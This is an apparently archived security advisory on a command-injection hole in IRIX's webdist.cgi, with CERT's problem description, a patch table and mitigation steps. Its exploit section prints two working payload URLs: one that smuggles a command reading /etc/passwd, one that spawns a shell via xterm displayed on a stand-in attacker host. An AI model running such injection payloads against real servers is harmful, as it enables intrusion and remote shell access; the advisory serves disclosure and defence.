COMMAND
webdist.cgi
SYSTEMS AFFECTED
IRIX 5.x and 6.x
PROBLEM
webdist.cgi allows webdist(1) to be used via an HTML form
interface defined in the file webdist.html, which is installed in
the default document root directories for both the Netsite and
Out Box servers.
Due to insufficient checking of the arguments passed to
webdist.cgi, it may be possible to execute arbitrary commands
with the privileges of the httpd daemon. This is done via the
webdist program.
When installed, webdist.cgi is accessible by anyone who can
connect to the httpd daemon. Because of this, the vulnerability
may be exploited by remote users as well as local users. Even if
a site's webserver is behind a firewall, it may still be
vulnerable. Local and remote users may be able to execute
arbitrary commands on the HTTP server with the privileges of the
httpd daemon. This may be used to compromise the http server and
under certain configurations gain privileged access. Credit for
text goes to CERT.
Exploit should go like this (by Grant Haufmann):
Title: Default IRIX cgi-bin programs
OS: irix
OSver: 6.2,6.3
Files: /var/www/cgi-bin/webdist.cgi
Perms: X
Access: Remote
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
or (by Chris Sheldon)
http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
The '-ut' is the most important part.
SOLUTION
You may remove the permissions:
# chmod 400 /var/www/cgi-bin/webdist.cgi
You can also remove outbox.sw.webdist subsystem. But if you
can't live without any of these, apply patch:
OS Version Vulnerable? Patch # Other Actions
---------- ----------- ------- -------------
IRIX 3.x no
IRIX 4.x no
IRIX 5.0.x no
IRIX 5.1.x no
IRIX 5.2 no
IRIX 5.3 yes 2315
IRIX 6.0.x yes not avail Note
IRIX 6.1 yes not avail Note
IRIX 6.2 yes 2314
IRIX 6.3 yes 2338
IRIX 6.4 yes 2338
Note means to upgrade operating system or see temp solutions
before.